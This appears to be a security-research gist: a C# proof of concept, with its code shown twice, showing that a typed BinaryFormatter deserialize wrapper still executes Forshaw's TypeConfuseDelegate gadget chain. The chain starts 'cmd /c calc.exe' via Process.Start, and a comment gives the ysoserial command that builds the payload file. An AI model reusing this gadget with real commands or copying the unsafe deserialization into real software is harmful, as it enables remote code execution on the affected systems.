Frycos/CheckTypedDeserialization.cs

## CheckTypedDeserialization.cs
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.Serialization.Formatters;
using System.Runtime.Serialization.Formatters.Binary;

namespace CheckTypedDeser
{
    class Program
    {
        static void Main(string[] args)
        {
            if (args.Length != 1)
            {
                Console.WriteLine("usage: CheckTypedSer.exe <file|graph>");
                return;
            }

            if (args[0].Equals("file"))
            {
                // ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc.exe" -o raw > malicious.ser
                Console.WriteLine("Read file...");
                FileStream fs = new FileStream("malicious.ser", FileMode.Open);
                Console.WriteLine("Deserialize content...");
                Deserialize<Message>(fs);
            }
            else if (args[0].Equals("graph"))
            {
                // TypeConfuseDelegate Forshaw ysoserial.NET
                Console.WriteLine("Building object from TypeConfuseDelegate...");
                ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");

                Delegate da = new Comparison<string>(String.Compare);
                Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
                IComparer<string> comp = Comparer<string>.Create(d);
                SortedSet<string> set = new SortedSet<string>(comp);
                set.Add("cmd");
                set.Add("/c " + "calc.exe");
                FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
                object[] invoke_list = d.GetInvocationList();
                invoke_list[1] = new Func<string, string, Process>(Process.Start);
                fi.SetValue(d, invoke_list);

                object obj = new Message("NotRelevant", set);
                MemoryStream ms = new MemoryStream();
                Console.WriteLine("Serialize content...");
                new BinaryFormatter
                {
                    AssemblyFormat = FormatterAssemblyStyle.Simple
                }.Serialize(ms, obj);

                Console.WriteLine("Deserialize content...");
                ms.Position = 0;
                Deserialize<Message>(ms);
            }
            else { Console.WriteLine("usage: CheckTypedSer.exe <file|graph>"); }
        }

        static T Deserialize<T>(Stream stream)
        {
            return (T)((object)new BinaryFormatter
            {
                AssemblyFormat = FormatterAssemblyStyle.Simple
            }.Deserialize(stream));
        }
    }

    [Serializable]
    class Message
    {
        private string someString;
        private object someObj;

        public Message(string mString, object mObj)
        {
            someString = mString;
            someObj = mObj;
        }
    }
}
	using System;
	using System.Collections.Generic;
	using System.Configuration;
	using System.Diagnostics;
	using System.IO;
	using System.Reflection;
	using System.Runtime.Serialization.Formatters;
	using System.Runtime.Serialization.Formatters.Binary;

	namespace CheckTypedDeser
	{
	class Program
	{
	static void Main(string[] args)
	{
	if (args.Length != 1)
	{
	Console.WriteLine("usage: CheckTypedSer.exe <file\|graph>");
	return;
	}

	if (args[0].Equals("file"))
	{
	// ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc.exe" -o raw > malicious.ser
	Console.WriteLine("Read file...");
	FileStream fs = new FileStream("malicious.ser", FileMode.Open);
	Console.WriteLine("Deserialize content...");
	Deserialize<Message>(fs);
	}
	else if (args[0].Equals("graph"))
	{
	// TypeConfuseDelegate Forshaw ysoserial.NET
	Console.WriteLine("Building object from TypeConfuseDelegate...");
	ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");

	Delegate da = new Comparison<string>(String.Compare);
	Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
	IComparer<string> comp = Comparer<string>.Create(d);
	SortedSet<string> set = new SortedSet<string>(comp);
	set.Add("cmd");
	set.Add("/c " + "calc.exe");
	FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic \| BindingFlags.Instance);
	object[] invoke_list = d.GetInvocationList();
	invoke_list[1] = new Func<string, string, Process>(Process.Start);
	fi.SetValue(d, invoke_list);

	object obj = new Message("NotRelevant", set);
	MemoryStream ms = new MemoryStream();
	Console.WriteLine("Serialize content...");
	new BinaryFormatter
	{
	AssemblyFormat = FormatterAssemblyStyle.Simple
	}.Serialize(ms, obj);

	Console.WriteLine("Deserialize content...");
	ms.Position = 0;
	Deserialize<Message>(ms);
	}
	else { Console.WriteLine("usage: CheckTypedSer.exe <file\|graph>"); }
	}

	static T Deserialize<T>(Stream stream)
	{
	return (T)((object)new BinaryFormatter
	{
	AssemblyFormat = FormatterAssemblyStyle.Simple
	}.Deserialize(stream));
	}
	}

	[Serializable]
	class Message
	{
	private string someString;
	private object someObj;

	public Message(string mString, object mObj)
	{
	someString = mString;
	someObj = mObj;
	}
	}
	}